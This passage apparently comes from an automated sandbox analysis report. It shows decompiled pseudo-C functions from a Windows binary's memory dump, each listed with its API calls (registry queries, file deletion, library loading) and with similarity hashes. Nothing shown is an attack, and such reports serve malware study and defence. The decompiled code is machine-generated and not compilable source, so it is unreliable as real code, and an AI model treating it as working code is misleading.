                                                            • FindNextFileW.KERNEL32(000000FF,?,00000000,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001), ref: 0060DECE
                                                            • FindClose.KERNEL32(000000FF,0060DEF9,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001,00000001), ref: 0060DEEC
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Find$CloseFileNext
                                                            • String ID:
                                                            • API String ID: 2066263336-0
                                                            • Opcode ID: 2bf6b48b7341af57f2f3f2ceaef2cdf982b33b7afcb593d7ac095b3d8ca16098
                                                            • Instruction ID: 99f5a77a41558a3604df8ac4250e6fc047523390e4335a570d25b15aca54e13b
                                                            • Opcode Fuzzy Hash: 2bf6b48b7341af57f2f3f2ceaef2cdf982b33b7afcb593d7ac095b3d8ca16098
                                                            • Instruction Fuzzy Hash: CD81B0309442899EDF15DFA5C845BEFBBB6AF45304F1482AAE844673C1C7349F45CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E005C77F4(void* __eax, void* __ebx, intOrPtr __ecx, short* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                            				char _v8;
                                                            				short* _v12;
                                                            				intOrPtr _v16;
                                                            				int _v20;
                                                            				int _v24;
                                                            				long _t46;
                                                            				signed int _t58;
                                                            				char _t66;
                                                            				intOrPtr _t82;
                                                            				void* _t87;
                                                            				signed int _t93;
                                                            				void* _t96;
                                                            
                                                            				_v8 = 0;
                                                            				_v16 = __ecx;
                                                            				_v12 = __edx;
                                                            				_t87 = __eax;
                                                            				_push(_t96);
                                                            				_push(0x5c792a);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t96 + 0xffffffec;
                                                            				while(1) {
                                                            					_v24 = 0;
                                                            					_t46 = RegQueryValueExW(_t87, _v12, 0,  &_v20, 0,  &_v24); // executed
                                                            					if(_t46 != 0 || _v20 != _a8 && _v20 != _a4) {
                                                            						break;
                                                            					}
                                                            					if(_v24 != 0) {
                                                            						__eflags = _v24 - 0x70000000;
                                                            						if(__eflags >= 0) {
                                                            							E00428FFC();
                                                            						}
                                                            						_t80 = _v24 + 1 >> 1;
                                                            						E0040A350( &_v8, _v24 + 1 >> 1, 0, __eflags);
                                                            						_t58 = RegQueryValueExW(_t87, _v12, 0,  &_v20, E0040A774( &_v8),  &_v24); // executed
                                                            						__eflags = _t58 - 0xea;
                                                            						if(_t58 == 0xea) {
                                                            							continue;
                                                            						} else {
                                                            							__eflags = _t58;
                                                            							if(_t58 != 0) {
                                                            								break;
                                                            							}
                                                            							__eflags = _v20 - _a8;
                                                            							if(_v20 == _a8) {
                                                            								L12:
                                                            								_t93 = _v24 >> 1;
                                                            								while(1) {
                                                            									__eflags = _t93;
                                                            									if(_t93 == 0) {
                                                            										break;
                                                            									}
                                                            									_t66 = _v8;
                                                            									__eflags =  *((short*)(_t66 + _t93 * 2 - 2));
                                                            									if( *((short*)(_t66 + _t93 * 2 - 2)) == 0) {
                                                            										_t93 = _t93 - 1;
                                                            										__eflags = _t93;
                                                            										continue;
                                                            									}
                                                            									break;
                                                            								}
                                                            								__eflags = _v20 - 7;
                                                            								if(_v20 == 7) {
                                                            									__eflags = _t93;
                                                            									if(_t93 != 0) {
                                                            										_t93 = _t93 + 1;
                                                            										__eflags = _t93;
                                                            									}
                                                            								}
                                                            								E0040B3F0( &_v8, _t80, _t93);
                                                            								__eflags = _v20 - 7;
                                                            								if(_v20 == 7) {
                                                            									__eflags = _t93;
                                                            									if(_t93 != 0) {
                                                            										(E0040A774( &_v8))[_t93 * 2 - 2] = 0;
                                                            									}
                                                            								}
                                                            								E0040A5A8(_v16, _v8);
                                                            								break;
                                                            							}
                                                            							__eflags = _v20 - _a4;
                                                            							if(_v20 != _a4) {
                                                            								break;
                                                            							}
                                                            							goto L12;
                                                            						}
                                                            					} else {
                                                            						E0040A1C8(_v16);
                                                            						break;
                                                            					}
                                                            				}
                                                            				_pop(_t82);
                                                            				 *[fs:eax] = _t82;
                                                            				_push(E005C7931);
                                                            				return E0040A1C8( &_v8);
                                                            			}


                                                            APIs
                                                            • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670,00000000), ref: 005C7830
                                                            • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,70000000,00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670), ref: 005C789E
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: QueryValue
                                                            • String ID:
                                                            • API String ID: 3660427363-0
                                                            • Opcode ID: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                            • Instruction ID: 9b528eccc0d206dd4e001c403f359889162c2cb04d4ae21286424304afe4548d
                                                            • Opcode Fuzzy Hash: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                            • Instruction Fuzzy Hash: 0D414731A0421DAFDB10DBD5C985EAEBBB8FB08700F50486AE915B7690D734AE04CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E005D0A74(intOrPtr* __eax, void* __eflags, void* __fp0) {
                                                            				intOrPtr* _v8;
                                                            				intOrPtr _v12;
                                                            				int _v16;
                                                            				int _v20;
                                                            				void* _v28;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* __ebp;
                                                            				int _t68;
                                                            				int _t72;
                                                            				intOrPtr _t88;
                                                            				void* _t89;
                                                            				intOrPtr _t94;
                                                            				void* _t102;
                                                            				intOrPtr _t103;
                                                            				intOrPtr _t111;
                                                            				void* _t113;
                                                            				int _t114;
                                                            				void* _t116;
                                                            				void* _t121;
                                                            				void* _t123;
                                                            				intOrPtr _t124;
                                                            				void* _t126;
                                                            
                                                            				_t126 = __eflags;
                                                            				_t121 = _t123;
                                                            				_t124 = _t123 + 0xffffffe8;
                                                            				_push(_t89);
                                                            				_push(_t116);
                                                            				_push(_t113);
                                                            				_v8 = __eax;
                                                            				_t94 =  *0x6cdb9c; // 0x6d66b8
                                                            				_t2 = _t94 + 0x2c; // 0x8
                                                            				_t103 =  *0x6cdb9c; // 0x6d66b8
                                                            				_t3 = _t103 + 8; // 0x0
                                                            				E005CE198( *((intOrPtr*)(_v8 + 0x74)), _t89,  *_t2,  *_t3, _t113, _t116, __fp0, 8, 0); // executed
                                                            				E005CE26C( *((intOrPtr*)(_v8 + 0x74)), _t89, _v8 + 0x3d4, _v8 + 0x3d0, _t113, _t116, _t126); // executed
                                                            				if( *(_v8 + 0x3d0) != 6) {
                                                            					L2:
                                                            					_v12 = E005D10C4(0, 1, _t113);
                                                            					 *[fs:eax] = _t124;
                                                            					E005D0564(_v8, _v12);
                                                            					E005CE3FC(_v8, 6,  *(_v8 + 0x3d0), _t128, 0xd,  *(_v8 + 0x3d4));
                                                            					 *((intOrPtr*)( *_v8 + 0x70))( *[fs:eax], 0x5d0bae, _t121);
                                                            					_t114 = _v20;
                                                            					_t68 = MulDiv(_t114,  *(_v8 + 0x3d0), 6);
                                                            					_t72 = MulDiv(_v16,  *(_v8 + 0x3d4), 0xd);
                                                            					E005AE564(_v8);
                                                            					 *((intOrPtr*)( *_v8 + 0xc8))(E005AE584(_v8), _t72 +  *((intOrPtr*)(_v8 + 0x5c)) - _v16, _t68 +  *((intOrPtr*)(_v8 + 0x58)) - _t114);
                                                            					_pop(_t111);
                                                            					_pop(_t102);
                                                            					 *[fs:eax] = _t111;
                                                            					_push(E005D0BB5);
                                                            					return E005D05DC( *_v8, _t102, _v12, 0);
                                                            				} else {
                                                            					_t88 = _v8;
                                                            					_t128 =  *((intOrPtr*)(_t88 + 0x3d4)) - 0xd;
                                                            					if( *((intOrPtr*)(_t88 + 0x3d4)) == 0xd) {
                                                            						return _t88;
                                                            					} else {
                                                            						goto L2;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                              • Part of subcall function 005CE26C: GetDC.USER32(00000000), ref: 005CE27D
                                                              • Part of subcall function 005CE26C: SelectObject.GDI32(00000001,00000000), ref: 005CE29F
                                                              • Part of subcall function 005CE26C: GetTextExtentPointW.GDI32(00000001,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CE2B3
                                                              • Part of subcall function 005CE26C: GetTextMetricsW.GDI32(00000001,?,00000000,005CE2F8,?,00000000,?,0068D5D0,00000001), ref: 005CE2D5
                                                              • Part of subcall function 005CE26C: ReleaseDC.USER32 ref: 005CE2F2
                                                            • MulDiv.KERNEL32(006B66BF,00000006,00000006), ref: 005D0B41
                                                            • MulDiv.KERNEL32(?,?,0000000D), ref: 005D0B58
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Text$ExtentMetricsObjectPointReleaseSelect
                                                            • String ID:
                                                            • API String ID: 844173074-0
                                                            • Opcode ID: 56f948a4803d8bda42e55077044f91e3e5fa0501c30f1b7e22e41dab0d924d4d
                                                            • Instruction ID: 4b3286446c155bbe1f679e64263f80cdfde84c69ba5731eb2fff00bff0d4e1b0
                                                            • Opcode Fuzzy Hash: 56f948a4803d8bda42e55077044f91e3e5fa0501c30f1b7e22e41dab0d924d4d
                                                            • Instruction Fuzzy Hash: 8F41E735A00108EFDB00DBA8D986EADB7F9FB88704F1541A6F904EB361D771AE41DB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 72%
                                                            			E0040E8BC(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
                                                            				intOrPtr _v8;
                                                            				signed int _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				signed int _t41;
                                                            				signed short _t43;
                                                            				signed short _t46;
                                                            				signed int _t60;
                                                            				intOrPtr _t68;
                                                            				void* _t79;
                                                            				signed int* _t81;
                                                            				intOrPtr _t84;
                                                            
                                                            				_t79 = __edi;
                                                            				_t61 = __ecx;
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_t81 = __ecx;
                                                            				_v12 = __edx;
                                                            				_v8 = __eax;
                                                            				E0040A2AC(_v8);
                                                            				E0040A2AC(_v12);
                                                            				_push(_t84);
                                                            				_push(0x40e9d3);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t84;
                                                            				E0040A1C8(__ecx);
                                                            				if(_v12 == 0) {
                                                            					L14:
                                                            					_pop(_t68);
                                                            					 *[fs:eax] = _t68;
                                                            					_push(E0040E9DA);
                                                            					return E0040A228( &_v28, 6);
                                                            				}
                                                            				E0040A5F0( &_v20, _v12);
                                                            				_t41 = _v12;
                                                            				if(_t41 != 0) {
                                                            					_t41 =  *(_t41 - 4);
                                                            				}
                                                            				_t60 = _t41;
                                                            				if(_t60 < 1) {
                                                            					L7:
                                                            					_t43 = E0040E5E0(_v8, _t60, _t61,  &_v16, _t81); // executed
                                                            					if(_v16 == 0) {
                                                            						L0040524C();
                                                            						E0040DF90(_t43, _t60,  &_v24, _t79, _t81);
                                                            						_t46 = E0040E70C(_v20, _t60, _t81, _v24, _t79, _t81); // executed
                                                            						__eflags =  *_t81;
                                                            						if( *_t81 == 0) {
                                                            							__eflags =  *0x6d1c10;
                                                            							if( *0x6d1c10 == 0) {
                                                            								L00405254();
                                                            								E0040DF90(_t46, _t60,  &_v28, _t79, _t81);
                                                            								E0040E70C(_v20, _t60, _t81, _v28, _t79, _t81);
                                                            							}
                                                            						}
                                                            						__eflags =  *_t81;
                                                            						if(__eflags == 0) {
                                                            							E0040E7F0(_v20, _t60, _t81, __eflags); // executed
                                                            						}
                                                            					} else {
                                                            						E0040E70C(_v20, _t60, _t81, _v16, _t79, _t81);
                                                            					}
                                                            					goto L14;
                                                            				}
                                                            				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
                                                            					_t60 = _t60 - 1;
                                                            					__eflags = _t60;
                                                            					if(_t60 != 0) {
                                                            						continue;
                                                            					}
                                                            					goto L7;
                                                            				}
                                                            				_t61 = _t60;
                                                            				E0040B698(_v12, _t60, 1,  &_v20);
                                                            				goto L7;
                                                            			}

                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E967
                                                            • GetSystemDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E98F
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: DefaultLanguage$SystemUser
                                                            • String ID:
                                                            • API String ID: 384301227-0
                                                            • Opcode ID: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                            • Instruction ID: f222509f0094d30d647024d0898a7a2300edb3e6cc60590d57b3240daf1099d8
                                                            • Opcode Fuzzy Hash: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                            • Instruction Fuzzy Hash: F1312170A002199FDB10EB9AC881BAEB7B5EF44308F50497BE400B73D1D7789D558B59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			E00414020(void* __ebx, void* __esi, struct HINSTANCE__* _a4, CHAR* _a8) {
                                                            				char _v8;
                                                            				_Unknown_base(*)()* _v12;
                                                            				_Unknown_base(*)()* _t22;
                                                            				CHAR* _t31;
                                                            				intOrPtr _t38;
                                                            				intOrPtr _t39;
                                                            				struct HINSTANCE__* _t41;
                                                            				void* _t43;
                                                            				void* _t44;
                                                            				intOrPtr _t45;
                                                            
                                                            				_t43 = _t44;
                                                            				_t45 = _t44 + 0xfffffff8;
                                                            				_v8 = 0;
                                                            				_t31 = _a8;
                                                            				_t41 = _a4;
                                                            				_push(_t43);
                                                            				_push(0x4140be);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t45;
                                                            				if(_t31 >> 0x10 != 0) {
                                                            					_push(_t43);
                                                            					 *[fs:eax] = _t45;
                                                            					E0040A1EC( &_v8);
                                                            					E0040A944( &_v8, 0, _t31,  *[fs:eax]);
                                                            					_t22 = GetProcAddress(_t41, E0040AC70(_v8)); // executed
                                                            					_v12 = _t22;
                                                            					_t38 = 0x4140a1;
                                                            					 *[fs:eax] = _t38;
                                                            					_push(E004140A8);
                                                            					return E0040A1EC( &_v8);
                                                            				} else {
                                                            					_v12 = GetProcAddress(_t41, _t31);
                                                            					_pop(_t39);
                                                            					 *[fs:eax] = _t39;
                                                            					_push(E004140C5);
                                                            					return E0040A1EC( &_v8);
                                                            				}
                                                            			}














                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00414083
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E0040E9E0(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				char _v8;
                                                            				short _v530;
                                                            				char _v536;
                                                            				char _v540;
                                                            				void* _t44;
                                                            				intOrPtr _t45;
                                                            				void* _t49;
                                                            				void* _t52;
                                                            
                                                            				_v536 = 0;
                                                            				_v540 = 0;
                                                            				_v8 = 0;
                                                            				_t49 = __eax;
                                                            				_push(_t52);
                                                            				_push(0x40ea9a);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t52 + 0xfffffde8;
                                                            				GetModuleFileNameW(0,  &_v530, 0x105);
                                                            				E0040B2DC( &_v536, _t49);
                                                            				_push(_v536);
                                                            				E0040B318( &_v540, 0x105,  &_v530);
                                                            				_pop(_t44); // executed
                                                            				E0040E8BC(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
                                                            				if(_v8 != 0) {
                                                            					LoadLibraryExW(E0040B278(_v8), 0, 2);
                                                            				}
                                                            				_pop(_t45);
                                                            				 *[fs:eax] = _t45;
                                                            				_push(E0040EAA1);
                                                            				E0040A228( &_v540, 2);
                                                            				return E0040A1C8( &_v8);
                                                            			}












                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName
                                                            • String ID:
                                                            • API String ID: 1159719554-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 48%
                                                            			E0062CFB8(void* __ebx) {
                                                            				void* _v8;
                                                            				intOrPtr _t20;
                                                            				intOrPtr _t21;
                                                            				intOrPtr* _t22;
                                                            				intOrPtr* _t25;
                                                            				intOrPtr _t34;
                                                            				intOrPtr _t38;
                                                            
                                                            				_push(0);
                                                            				_push(_t38);
                                                            				_push(0x62d04e);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t38;
                                                            				if( *0x6d63b4 != 0) {
                                                            					L6:
                                                            					_pop(_t34);
                                                            					 *[fs:eax] = _t34;
                                                            					_push(E0062D055);
                                                            					return E0040EC28( &_v8);
                                                            				}
                                                            				if(GetVersion() >= 0x601) {
                                                            					_push(E0040EC28( &_v8));
                                                            					_t20 =  *0x6ce1cc; // 0x6cd0d4
                                                            					_push(_t20);
                                                            					_push(1);
                                                            					_push(0);
                                                            					_t21 =  *0x6cdad4; // 0x6cd0c4
                                                            					_push(_t21); // executed
                                                            					L0043C1EC(); // executed
                                                            					if(_t21 == 0) {
                                                            						_t22 = _v8;
                                                            						_push(_t22);
                                                            						if( *((intOrPtr*)( *_t22 + 0xc))() == 0) {
                                                            							_t25 = _v8;
                                                            							 *((intOrPtr*)( *_t25 + 4))(_t25);
                                                            							E0040EC40(0x6d63b8, _v8);
                                                            						}
                                                            					}
                                                            				}
                                                            				 *0x6d63b4 = 1;
                                                            				goto L6;
                                                            			}











                                                            APIs
                                                            • GetVersion.KERNEL32(00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFD5
                                                            • CoCreateInstance.OLE32(006CD0C4,00000000,00000001,006CD0D4,00000000,00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFFB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateInstanceVersion
                                                            • String ID:
                                                            • API String ID: 1462612201-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 69%
                                                            			E005ABB4C(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				intOrPtr _t12;
                                                            				intOrPtr _t16;
                                                            				intOrPtr _t23;
                                                            				intOrPtr _t24;
                                                            				intOrPtr _t25;
                                                            				intOrPtr _t26;
                                                            				void* _t30;
                                                            				void* _t31;
                                                            				intOrPtr _t32;
                                                            
                                                            				_t30 = _t31;
                                                            				_t32 = _t31 + 0xfffffff4;
                                                            				_t23 =  *0x6ccbac; // 0x0
                                                            				_v12 = _t23;
                                                            				_t24 =  *0x6ccbbc; // 0x0
                                                            				_v16 = _t24;
                                                            				 *0x6ccbac = __eax;
                                                            				 *0x6ccbbc = 0;
                                                            				_push(_t30);
                                                            				_push(0x5abbf9);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t32;
                                                            				 *0x6ccbb8 = 1;
                                                            				_push(_t30);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t32;
                                                            				EnumThreadWindows(GetCurrentThreadId(), 0x5abafc, 0);
                                                            				_t12 =  *0x6ccbbc; // 0x0
                                                            				_v8 = _t12;
                                                            				_pop(_t25);
                                                            				 *[fs:eax] = _t25;
                                                            				_t26 = 0x5abbbb;
                                                            				 *[fs:eax] = _t26;
                                                            				_push(E005ABC00);
                                                            				 *0x6ccbb8 = 0;
                                                            				 *0x6ccbbc = _v16;
                                                            				_t16 = _v12;
                                                            				 *0x6ccbac = _t16;
                                                            				return _t16;
                                                            			}
















                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 005ABB9E
                                                            • EnumThreadWindows.USER32(00000000,005ABAFC,00000000), ref: 005ABBA4
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Thread$CurrentEnumWindows
                                                            • String ID:
                                                            • API String ID: 2396873506-0
                                                            • Opcode ID: 50b1606a0afe4943f6b819d05498a248b249cba9426d36aa2a532158776b3fde
                                                            • Instruction ID: ee6e8008b641080cd7585ababab2aba3c455f5a37fbde39c0718e37cfc8f8a06
                                                            • Opcode Fuzzy Hash: 50b1606a0afe4943f6b819d05498a248b249cba9426d36aa2a532158776b3fde
                                                            • Instruction Fuzzy Hash: C5112574A08744AFD711CF66DCA2D6ABFE9E74A720F1194AAE804D3791E7756C00CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E0060C158(void* __eax, void* __edx, void* __eflags) {
                                                            				int _v8;
                                                            				char _v16;
                                                            				long _v20;
                                                            				int _t13;
                                                            				intOrPtr _t27;
                                                            				void* _t32;
                                                            				void* _t34;
                                                            				intOrPtr _t35;
                                                            
                                                            				_t32 = _t34;
                                                            				_t35 = _t34 + 0xfffffff0;
                                                            				if(E0060BF74(__eax,  &_v16) != 0) {
                                                            					_push(_t32);
                                                            					_push(0x60c1b5);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t35;
                                                            					_t13 = DeleteFileW(E0040B278(__edx)); // executed
                                                            					_v8 = _t13;
                                                            					_v20 = GetLastError();
                                                            					_pop(_t27);
                                                            					 *[fs:eax] = _t27;
                                                            					_push(E0060C1BC);
                                                            					return E0060BFB0( &_v16);
                                                            				} else {
                                                            					_v8 = 0;
                                                            					return _v8;
                                                            				}
                                                            			}












                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C18F
                                                            • GetLastError.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C197
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2018770650-0
                                                            • Opcode ID: 3697c3af58fd59330cb1976570848beae36e068bde04d4d9265381b0fddbc49e
                                                            • Instruction ID: 318e45fb2803f7fcaacad33ae20e8141f5d943eca3b4fb5a26b9ca9ca2c048f0
                                                            • Opcode Fuzzy Hash: 3697c3af58fd59330cb1976570848beae36e068bde04d4d9265381b0fddbc49e
                                                            • Instruction Fuzzy Hash: 9EF0C831A44308ABCB04DFB59C4149FB7E9DB0932075147FAF804D3382E7745E005994
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E0060C664(void* __eax, void* __edx, void* __eflags) {
                                                            				int _v8;
                                                            				char _v16;
                                                            				long _v20;
                                                            				int _t13;
                                                            				intOrPtr _t27;
                                                            				void* _t32;
                                                            				void* _t34;
                                                            				intOrPtr _t35;
                                                            
                                                            				_t32 = _t34;
                                                            				_t35 = _t34 + 0xfffffff0;
                                                            				if(E0060BF74(__eax,  &_v16) != 0) {
                                                            					_push(_t32);
                                                            					_push(0x60c6c1);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t35;
                                                            					_t13 = RemoveDirectoryW(E0040B278(__edx)); // executed
                                                            					_v8 = _t13;
                                                            					_v20 = GetLastError();
                                                            					_pop(_t27);
                                                            					 *[fs:eax] = _t27;
                                                            					_push(E0060C6C8);
                                                            					return E0060BFB0( &_v16);
                                                            				} else {
                                                            					_v8 = 0;
                                                            					return _v8;
                                                            				}
                                                            			}












                                                            APIs
                                                            • RemoveDirectoryW.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C69B
                                                            • GetLastError.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C6A3
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: DirectoryErrorLastRemove
                                                            • String ID:
                                                            • API String ID: 377330604-0
                                                            • Opcode ID: 53d77f0b7f1706873743be23e773c9934c7890b647961f754ec8971419ba3f02
                                                            • Instruction ID: 4dcda24c2f25390586e6dcbd063c7cff493c698b67123ab594910c5e431ffc76
                                                            • Opcode Fuzzy Hash: 53d77f0b7f1706873743be23e773c9934c7890b647961f754ec8971419ba3f02
                                                            • Instruction Fuzzy Hash: 86F0C231A94208ABDB14DFB5AC418AFB3E9DB493207514BBAF804E3281EB755E105698
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E0042B848(void* __eax, void* __ebx, int __edx) {
                                                            				struct HINSTANCE__* _v12;
                                                            				int _v16;
                                                            				int _t4;
                                                            				struct HINSTANCE__* _t9;
                                                            				void* _t12;
                                                            				intOrPtr _t16;
                                                            				void* _t18;
                                                            				void* _t19;
                                                            				intOrPtr _t20;
                                                            
                                                            				_t18 = _t19;
                                                            				_t20 = _t19 + 0xfffffff4;
                                                            				_t12 = __eax;
                                                            				_t4 = SetErrorMode(__edx); // executed
                                                            				_v16 = _t4;
                                                            				_push(_t18);
                                                            				_push(0x42b8ba);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t20;
                                                            				asm("fnstcw word [ebp-0x2]");
                                                            				_push(_t18);
                                                            				_push(0x42b89c);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t20;
                                                            				_t9 = LoadLibraryW(E0040B278(_t12)); // executed
                                                            				_v12 = _t9;
                                                            				_pop(_t16);
                                                            				 *[fs:eax] = _t16;
                                                            				_push(E0042B8A3);
                                                            				asm("fclex");
                                                            				asm("fldcw word [ebp-0x2]");
                                                            				return 0;
                                                            			}













                                                            APIs
                                                            • SetErrorMode.KERNEL32(00008000,00000000), ref: 0042B852
                                                            • LoadLibraryW.KERNEL32(00000000,00000000,0042B89C,?,00000000,0042B8BA,?,00008000,00000000), ref: 0042B881
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorLibraryLoadMode
                                                            • String ID:
                                                            • API String ID: 2987862817-0
                                                            • Opcode ID: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                            • Instruction ID: 1e325d9ebe5d0822fb749a998e89c34c252ba1fb5941e6000e67edf6569427d0
                                                            • Opcode Fuzzy Hash: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                            • Instruction Fuzzy Hash: D6F08270614704BEDB016FB69C5286FBBECEB4AB0079349B6F814A2691E67D581086A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E005B8250(void* __eax, void* __edx, void* __eflags) {
                                                            				void* _t9;
                                                            				void* _t17;
                                                            				void* _t22;
                                                            				void* _t23;
                                                            
                                                            				_t23 = __eflags;
                                                            				_t22 = __edx;
                                                            				_t17 = __eax;
                                                            				_t9 = E0040B660( *((intOrPtr*)(__eax + 0xa4)), __edx);
                                                            				if(_t23 == 0) {
                                                            					return _t9;
                                                            				}
                                                            				if( *((char*)(_t17 + 0xc4)) != 0) {
                                                            					if( *((char*)(_t17 + 0xeb)) == 0) {
                                                            						SetWindowTextW( *(_t17 + 0x188), E0040B278(__edx));
                                                            					} else {
                                                            						SetWindowTextW( *(_t17 + 0x188), 0);
                                                            					}
                                                            				}
                                                            				_t6 = _t17 + 0xa4; // 0xa4
                                                            				return E0040A5A8(_t6, _t22);
                                                            			}








                                                            APIs
                                                            • SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                            • SetWindowTextW.USER32(?,00000000), ref: 005B8297
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: TextWindow
                                                            • String ID:
                                                            • API String ID: 530164218-0
